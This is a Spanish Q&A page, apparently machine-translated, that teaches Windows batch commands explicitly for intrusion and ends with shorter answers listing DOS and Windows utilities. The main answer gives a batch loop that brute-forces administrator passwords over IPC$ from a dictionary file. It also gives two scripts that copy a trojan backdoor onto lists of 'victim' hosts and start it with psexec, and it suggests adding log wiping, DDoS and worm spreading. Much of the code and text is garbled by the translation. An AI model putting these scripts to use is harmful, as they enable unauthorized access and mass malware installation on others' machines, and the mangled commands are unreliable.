Enciclopedia de códigos de uso común para archivos BAT. Si es bueno, puedo agregar algunos.
1. Comando Echo
Activa o desactiva el eco, o muestra información. Sin argumentos, el comando echo muestra la configuración de eco actual.
Sintaxis
echo[{ on | off }][Mensaje]
Ejemplo: echo off/echo hola mundo
En la actualidad En la aplicación, usaremos este comando y símbolos de redirección (también llamados símbolos de canalización, generalmente >; gt gt) para ingresar algunos comandos en archivos en un formato específico. Esto se reflejará en ejemplos futuros.
2.@command
Esto significa que el comando después de @ no se mostrará. Durante el proceso de intrusión (como formatear el disco duro del enemigo mediante procesamiento por lotes), naturalmente no puedes permitir que la otra parte vea los comandos que utilizas.
Ejemplo: @echo off
@echo está inicializando el programa, espere...
@formatexx:/q/u/autoset (El formato es not Está permitido utilizar el parámetro /y. Afortunadamente, Microsoft nos ha dejado un parámetro autoset, que tiene el mismo efecto que /y..)
3. Especifica el salto a la etiqueta. Una vez que se encuentra la etiqueta, el programa comenzará a procesar comandos desde la siguiente línea.
Sintaxis: ir a etiqueta (la etiqueta es un parámetro que especifica la línea a la que ir en el programa por lotes).
Ejemplo:
if {1} = ={}Ir a noparms
If {2} = {} gotonoparms (Si no comprende If, 1, 2 aquí, omítalo primero; habrá una explicación detallada más adelante).
@Rem verifica los parámetros y muestra el uso si está vacío
: noparms
uso de eco: monitor.bat Número de puerto IP del servidor
Ir a al final
El nombre de la etiqueta se puede elegir arbitrariamente, pero es mejor que tenga letras significativas. Agregar un : antes de una letra indica que la letra es una etiqueta. El comando ir a se basa en esto: busque el siguiente paso y salte allí. Será mejor que tengas alguna explicación para que otros entiendan tu intención.
4.Comando Rem
El comando de comentario es equivalente a /*-*/ en lenguaje C. No se ejecutará, solo sirve como comentario para facilitar que otros lo lean y modifiquen en el futuro.
Mensaje remoto
Muestra: @RemAquí está la descripción.
5. Comando de pausa
Al ejecutar el comando de pausa, se mostrará el siguiente mensaje:
Presione cualquier tecla para continuar. . .
Muestra:
@apagar eco
: iniciar
Copiar a: *. *d:\return
echo, coloque un disco nuevo en el controlador A
abortar
ir al inicio
En este caso, todos Los archivos del disco en la unidad A se copian en d:\back. Aparece un mensaje que le solicita que coloque otro disco en la unidad A. El comando de pausa pausará el programa para que pueda reemplazar el disco y presionar cualquier tecla para continuar con el procesamiento.
6. Llamar comando
Llame a un programa por lotes desde otro programa por lotes sin finalizar el programa por lotes principal. El comando de llamada acepta una etiqueta que se utilizará como destino de la llamada. Si utiliza Llamar fuera de un script o archivo por lotes, no funcionará en la línea de comando.
Sintaxis
Llamar a [[unidad:] [ruta] nombre de archivo [parámetros de lote]] [: etiqueta [parámetros]]
Parámetros
[unidad:}[ruta]nombre de archivo
Especifica la ubicación y el nombre del programa por lotes que se llamará. El parámetro de nombre de archivo debe tener un .bat o .bat. extensión cmd.
7. Comando de inicio
Llamar a programas externos Todos los comandos de DOS y programas de línea de comandos se pueden llamar a través del comando de inicio.
Parámetros de intrusión comunes:
Minimizar la ventana comenzando con MIN
Iniciar un programa de Windows de 16 bits en un espacio separado.
Alto inicia aplicaciones en categorías de alta prioridad.
Inicie aplicaciones en la categoría de prioridad en tiempo real en tiempo real.
WAIT inicia la aplicación y espera a que finalice.
Parámetros Estos son los parámetros pasados al comando/programa.
Cuando la aplicación en ejecución es una aplicación GUI de 32 bits, CMD.EXE volverá al símbolo del sistema sin esperar a que finalice la aplicación. Este nuevo comportamiento no ocurrirá si se ejecuta dentro de un script de comando.
8. Seleccione Comando
Seleccione Usar este comando para permitir al usuario ingresar un carácter para ejecutar diferentes comandos. Al usarlo, agregue el parámetro /c: y escriba caracteres que se puedan ingresar después de c:, sin espacios en el medio. Su código de retorno es 1234...
Por ejemplo: elección /c:dme defrag,mem,end
se mostrará
defrag,mem,end [D,M,E]?
Muestra:
El contenido de Sample.bat es el siguiente:
@apagar eco
elección /c: desfragmentación dme , mem, end
Si el nivel de error es 3, vaya a la desfragmentación (el código de error con el valor más alto debe juzgarse primero)
Si el nivel de error es 2, vaya a la memoria
Si el error es Nivel 1, vaya al final
: Desfragmentación
c:\dos\defrag
Ir al final
: Memoria
Memoria
Ir al final
: Fin
Echo Adiós
Después de ejecutar este archivo, se mostrará la desfragmentación, mem,end[D,M,E]? El usuario puede seleccionar d m e, y luego la declaración if emitirá un juicio. d significa ejecutar la sección del programa marcada como defrag, M significa ejecutar la sección del programa marcada como mem y E significa ejecutar la sección del programa marcada como final. Cada segmento del programa saltará a la etiqueta final con goto end al final, y luego el programa mostrará adiós y el archivo finalizará.
9.Comando If
Si significa que determinará si se cumplen las condiciones especificadas y luego decidirá ejecutar diferentes comandos. Hay tres formatos:
1. Si se ejecuta el comando "parámetro" == "cadena"
Si el parámetro es igual a la cadena especificada, la condición es verdadera. Ejecute el comando; de lo contrario, ejecute la siguiente oración. (Tenga en cuenta los dos signos iguales)
Por ejemplo, si "1"=="a" da formato a:
if {1}=={}vaya a noparms
if {2}=={}ir a noparms
2. Si el nombre del archivo existe, es el comando a ejecutar.
Si hay un archivo específico y la condición es verdadera, ejecute el comando; de lo contrario, ejecute la siguiente oración.
Por ejemplo, si existe config . sys edite config .
3. Comando numérico a ejecutar si nivel de error/si no nivel de error.
Si el código de retorno es igual al número especificado, la condición es verdadera y se ejecuta el comando; de lo contrario, se ejecuta la siguiente oración.
Por ejemplo si el nivel de error 2 pasa a x2.
Cuando se ejecuta un programa de DOS, devolverá un número a DOS. Este número se denomina nivel de error o código de retorno. Los códigos de retorno comunes son 0,1.
10. Comando For
El comando for es un comando complejo, utilizado principalmente para ejecutar comandos cíclicamente dentro de un rango específico.
Cuando utilice el comando FOR en un archivo por lotes, utilice variable para especificar la variable.
para { variable | variable } en(set)do comando [CommandLineOptions]
variable especifica un parámetro reemplazable de una sola letra.
(set)Especifica un archivo o un grupo de archivos. Se pueden utilizar caracteres comodín.
Comando especifica el comando que se ejecutará para cada archivo.
Command-parameters especifica parámetros o modificadores de línea de comando para comandos específicos.
Cuando utilice el comando FOR en un archivo por lotes, utilice variable para especificar la variable.
En lugar de una variable. Los nombres de las variables distinguen entre mayúsculas y minúsculas, por lo que i es diferente de i.
Si las extensiones de comando están habilitadas, los siguientes formatos de comando FOR adicionales se ven afectados
Compatible:
Variable FOR/D IN (establecer) comando DO [comando- Parámetros]
Si la colección contiene comodines, especifica que coincide con nombres de directorios en lugar de archivos.
Coincidencias de nombres.
FOR/R[[unidad:]ruta] variable IN(set)DO comando[comando-
Compruebe el árbol de directorios con raíz en [unidad:]ruta y apunte a cada uno en un directorio.
Para declaraciones, si no se especifica ningún directorio después de /R, se utiliza el directorio actual.
Directorio. Si el conjunto es solo un carácter de punto (.), se enumera el árbol de directorios.
Variable FOR/L IN (inicio, paso, fin) comando DO [command-para
Este conjunto representa una serie de números que aumentan de principio a fin.
Por tanto, (1, 1, 5) producirá la secuencia 1 2 3 4 5 y (5, 1, 1) producirá.
El orden (5 4 3 2 1).
(conjunto de archivos) FOR/F[" opciones "] variable en el comando DO
FOR/F[" opciones "] variable IN ("cadena") comando DO< / p>
Variable FOR/F[" opciones "] en (comando) comando DO
O, si tiene la opción usebackq:
(conjunto de archivos) DO FOR/ F[" opciones "] variable en comando
FOR/F[" opciones "] variable IN ("cadena") DO comando
FOR/F[" opciones " ]Variable en (comando) DO comando
Filenameset es uno o más nombres de archivo. Continúe dentro del conjunto de nombres de archivo.
Cada archivo ha sido abierto, leído y procesado antes que el siguiente.
El procesamiento consiste en leer un archivo, dividirlo en líneas de texto y luego dividir cada línea en
análisis de cero o más símbolos. Luego llame al bucle For usando el valor de la variable de la cadena de símbolos encontrada
. De forma predeterminada, /F está separado por cada línea de cada archivo. El primer carácter de espacio en blanco de
. Salta líneas vacías. Puede anular la operación de análisis predeterminada especificando el parámetro opcional "opciones". Esta cadena entre comillas contiene una o más
palabras clave que especifican diferentes opciones de análisis.
Estas palabras clave son:
eol = c - Indica el carácter de comentario de final de línea (solo uno)
skip = n - Indica el número de líneas a ignorar al comienzo de la archivo.
delims = XXX: representa el conjunto de delimitadores. Esto reemplaza espacios y tabulaciones.
Delimitador predeterminado establecido.
Tokens=x,y,m-n: se refiere a qué token de cada fila se pasa a cada iteración.
Para ti. Esto dará como resultado nombres de variables adicionales.
El formato es un rango. Especifique m con el símbolo enésimo.
El último carácter de la cadena es un asterisco.
Entonces las variables adicionales se resolverán en el último símbolo.
Asigna y acepta texto reservado para esta línea.
usebackq: especifica que la nueva sintaxis se ha utilizado en los siguientes casos:
Después de ejecutar una cadena entre comillas como comando
El carácter de comillas es un literal comando de cadena, está permitido en fi
Encierre el nombre del archivo entre comillas dobles.
Muestra 1:
FOR/F "eol=;tokens=2,3* delims=", en (myfile.txt) do comando
Cada línea en myfile.txt se analizará, ignorando las que comienzan con punto y coma, y
El segundo y tercer símbolo de cada línea se pasarán al cuerpo del programa para usar comas y/o
delimitador de espacio. Tenga en cuenta que las declaraciones en el cuerpo del programa se refieren a i.
Para obtener el segundo símbolo, haga referencia a j para obtener el tercer símbolo, haga referencia a k.
Obtén todos los símbolos restantes después del tercer símbolo. Para nombres de archivos con espacios
debe encerrar el nombre del archivo entre comillas dobles. Para hacer
comillas dobles de esta manera, también necesita usar la opción usebackq; de lo contrario, las comillas dobles
se entenderán que se usan para definir la cadena a ser analizado.
i se declara específicamente en la declaración for, y j y k están dados por.
La opción Tokens= se especifica específicamente. Puedes pasar token = una línea.
Especifique hasta 26 símbolos, siempre y cuando no intente describir símbolos superiores a la letra z o variables superiores
Z, recuerde que las variables FOR son de una sola letra, mayúsculas y minúsculas. -sensible y global;
Al mismo tiempo, no se pueden utilizar más de 52.
También puede utilizar la lógica de análisis FOR /F en cadenas adyacentes.
Encierre el conjunto de nombres de archivos entre paréntesis entre comillas simples. De esta manera, la cadena de caracteres
se trata como una única línea de entrada en el archivo.
Finalmente, puedes usar el comando FOR /F para analizar el resultado de este comando. El método consiste en integrar los nombres de los archivos entre corchetes
en una cadena cerrada. Esta línea
se pasará al CMD.EXE secundario como línea de comando y se capturará su salida.
En memoria y analizado como un archivo. Por lo tanto, aquí hay un ejemplo:
FOR/F " usebackq delims == " I IN(` set `)DO @ echo I
Enumerar las variables de entorno en el nombre del entorno actual .
Además, se ha mejorado la sustitución de referencias de variables. Ahora puede utilizar la siguiente
sintaxis de opción:
~ I: elimine las comillas (") y expanda i.
~ fI: expanda I a Totalmente nombre de ruta calificado
~dI-only I se expande a una letra de unidad
~ pI-only I se expande a una ruta
~nI-. se expandirá a un nombre de archivo
~Solo I se expandirá a una extensión de archivo
~ Las rutas expandidas contienen solo nombres cortos.
~ aI-Expandir I al atributo de archivo del archivo
~ tI-Expandir I a la fecha/hora del archivo
~ zI-Expand I al atributo de archivo del archivo al tamaño del archivo
~$PATH:I - Localice el directorio que aparece en la variable de entorno PATH y expanda i.
Al primer nombre completo encontrado. Si la variable de entorno
no está definida o no se encuentra el archivo, esta combinación de teclas se expandirá.
Línea vacía
Los modificadores se pueden combinar para obtener una variedad de resultados:
~Solo dpI I se expande a una letra de unidad y una ruta.
~nxI-only I se expande al nombre y extensión del archivo.
~ fsI: solo expande I a la ruta completa con el nombre corto.
~ DP $PATH:I - Localice el directorio que aparece en la variable de entorno PATH y expanda i.
Vaya a la primera letra de unidad y ruta encontrada.
~ ftzaI - Expande I a líneas de salida similares a DIR
En el ejemplo anterior, I y PATH se pueden reemplazar con otros valores válidos. ~Sintaxis
Termina con un nombre de variable FOR válido. Elija un nombre de variable en mayúscula similar a i.
Es más fácil de leer y evita confusiones con combinaciones de teclas que no distinguen entre mayúsculas y minúsculas.
Lo anterior es la ayuda oficial de MS. Aquí hay algunos ejemplos para ilustrar el uso del comando For en intrusión.
Muestra 2:
El comando For se utiliza para descifrar la contraseña de fuerza bruta del host Win2k de destino.
Usamos net use \ \ IP \ IPC $ "contraseña" /u: "administrador" para intentar conectarnos al host de destino y anotamos la contraseña después del éxito.
El comando más importante es uno: for/f I in(dict . txt)do net use \ \ IP \ IPC $ "I"/u: "administrador".
I se utiliza para representar la contraseña de administrador. En dict.txt, este valor de i está conectado al comando net use. Luego pase los resultados de ejecución del programa al comando de búsqueda -
for/f I in(dict . txt)do net use \\IP\IPC$ "I"/u:"administrator"|find": comando completado con éxito" > gtD:\ok.txt, que es ko.
Muestra 3:
¿Hay una gran cantidad de pollos de engorde esperando que usted críe caballos de Troya de puerta trasera? Cuando el número es particularmente grande, todo lo que originalmente era feliz se vuelve muy deprimente. Como se mencionó al principio del artículo, el uso de archivos por lotes puede simplificar las tareas rutinarias o repetitivas. Entonces, ¿cómo lograrlo? Jaja, lo entenderás después de leerlo.
Solo hay un comando principal: (Cuando use el comando FOR en un archivo por lotes, use variable para especificar la variable).
@for /f "tokens=1, 2, 3 delims = " Yo en(victim . txt)empiezo a llamar a la puerta I j k
Consulte el uso de. tokens El ejemplo1 anterior se refiere a pasar el contenido de victim.txt a los parámetros i j k de door.bat en orden.
Cultivate.bat no es más que usar el comando net use para establecer una conexión IPC$, copiar la puerta trasera del troyano a la víctima y luego usar devolver copia (si errorlever =) para filtrar el host donde se encuentra el la puerta trasera se implanta correctamente y se emite o se reproduce en el archivo especificado.
Delims= significa que el contenido de vivtim.txt está separado por espacios. Creo que debes entender cómo se ve el contenido de este victim.txt cuando veas esto. Debe organizarse de acuerdo con el objeto representado por i j k, generalmente el nombre de usuario de la contraseña de IP.
Prototipo de código:
-Cortar aquí y guardar como archivo por lotes (yo lo llamo main.bat) -
@apagar echo
@if "1"== " "Ir a uso
@for /f "tokens=1, 2, 3 delims = " Yo en (víctima . txt) comienzo a llamar al IPC hack .bat I j k
@Ir al final
: Uso
@echo Ejecute este lote en modo DOS. O haga doble clic en él.
: Fin
-Cortar aquí, luego guardar como archivo por lotes (lo llamé main.bat) -
-Cortar aquí y luego guardarlo como un archivo por lotes (yo lo llamo door.bat)
@net use \\1\ipc$ 3 /u: "2 "
@if error nivel 1 goto falló
@echo está intentando establecer una conexión IPC... ok
@copy wind RV 32.exe\\1\admin$\system32 amp si no, nivel de error 1 echo IP 1; usuario 2 PWD 3 gt; gtko.txt
@ p * * * EC\\ 1 c:\win nt\system32\win drv 32.exe
@p * * * EC \ \ 1 net start windrv 32 amp; si no, nivel de error 1 echo 1 backdoor gt gtko.txt
: falló
@echo lo siento, no puedo conectarme con la víctima.
-Corte aquí y guárdelo como un archivo por lotes (yo lo llamo door.bat)
Esto es solo un prototipo de un lote de puerta trasera automatizado. Dos programas por lotes y de puerta trasera (Windrv32.exe), psexec. Exe debe colocarse en un directorio unificado. Contenido masivo.
Se puede ampliar, como agregar la función de borrar registros DDOS, agregar la función de agregar usuarios periódicamente y permitir que se propague automáticamente (gusanos) a través de un análisis en profundidad. No es necesario que lo describa aquí. Los amigos que estén interesados pueden hacer su propia investigación.
Acusado: 〆ɑMejorado oち-Asistente Nivel 3 12-1 02:41.
¿Crees que la mejor respuesta es buena? Actualmente hay 0 comentarios.
50 (0)
50 (0)
Otras respuestas*** 5
Los siguientes son comandos de uso común en DOS . Consulte /PC/Newer/OS/DOS/DOS 0301.htm para obtener más detalles.
Cd cambia el directorio actual sys al disco del sistema DOS
Copia el archivo copiado y elimina el archivo
Elimina el nombre del archivo de la columna del directorio del árbol de directorios .
Edición de disco edición de texto
Formatear disco md crear subdirectorio
Ver estado de memoria tipo mostrar contenido del archivo
Rd eliminar directorio tarea Cambiar archivo nombre
Entrevistado: Nordson 1983-Asistente Nivel 2 12-1 02:44.
Enciclopedia de comandos de DOS
/Article/other art/other/200508/1485 html
Investigador: tcj 0-Período de prueba nivel 12 -1 02: 45
Comprobador de archivos del sistema Sfc.exe
Protección de archivos Sfc /scannow-windows
Comando de apagado de cuenta regresiva Tsshutdn-60 segundos
Introducción a tourstartxp (programa touring xp después de la instalación)
Administrador de tareas Taskmgr
Eventvwr-visor de eventos
Programa de creación de palabras Eudcedit
p >
Navegador abierto
Empaquetado de objetos
Programa de monitoreo del rendimiento de la computadora Perfmon.msc
Programador Gerente de proyectos
p>
Registro Regedit.exe
Rsop.msc - Conjunto de resultados de directiva de grupo
Regedt32 - Editor de registro
Rononce -p 15 segundos Cerrar
Regsvr32 /u *. dll detiene la ejecución del archivo dll.
zipfldr.dll elimina la compatibilidad con códigos postales.
Símbolo del sistema Cmd.exeCMD
Chkdsk.exe-Chkdsk Disk Check
Utilidad de administración de certificados Certmgr.msc
Calc- Calculadora de inicio
Mapa de caracteres de inicio de Charmap
Utilidad de red cliente CLICONFG-SQL SERVER
Visor del portapapeles
Conferencia -Iniciar reunión web
Maestría en Gestión Informática
Cleanmgr-Eliminación de Basura
Programa de Servicio de Índice Ciadv.msc
Osk abre el teclado en pantalla.
Odbcad32-ODBC Data Source Manager
Oobe/msoobe /a Compruebe si XP se ha activado.
Usuarios y grupos locales de Lusrmgr.msc
Comando de cierre de sesión
Herramienta de enlace Iexpress-Trojan, viene con el sistema.
Nslookup-Detector de direcciones IP
Fsmgmt.msc-***Disfrute del Administrador de carpetas
Administrador de herramientas auxiliares Utilman
Gpedit.msc -Política de grupo